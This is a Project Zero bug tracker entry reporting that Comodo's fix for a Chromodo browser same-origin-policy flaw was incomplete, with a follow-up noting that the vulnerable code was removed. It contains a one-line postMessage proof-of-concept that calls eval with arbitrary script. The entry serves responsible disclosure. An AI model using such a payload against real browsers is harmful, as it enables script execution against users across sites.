713 - Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security. - project-zero

Starred by 2 users

Status:	Fixed
Owner:	taviso@google.com
Closed:	Feb 2016
Cc:	project-...@google.com
Reported-2016-Feb-01 Deadline-90 Finder-taviso Product-Chromodo Severity-Critical CCProjectZeroMembers Vendor-Comodo

Blocked on:
issue 704

Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security.

Project Member Reported by taviso@google.com, Feb 2 2016

Back to list

Comodo's fix for  issue 704  was incomplete, it's trivial to make the exploit work again like this:

window.postMessage(JSON.stringify({ command: "callOuterFunction", params: { func: "eval", arguments: ["alert(1)"] }}), "*");

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Project Member Comment 1 by taviso@google.com, Feb 2 2016

Blockedon: google-security-research:704

Project Member Comment 2 by taviso@google.com, Feb 5 2016

Labels: -Restrict-View-Commit
Status: Fixed

Looks like Comodo have pushed out a fix that completely removes the vulnerable code.

► Sign in to add a comment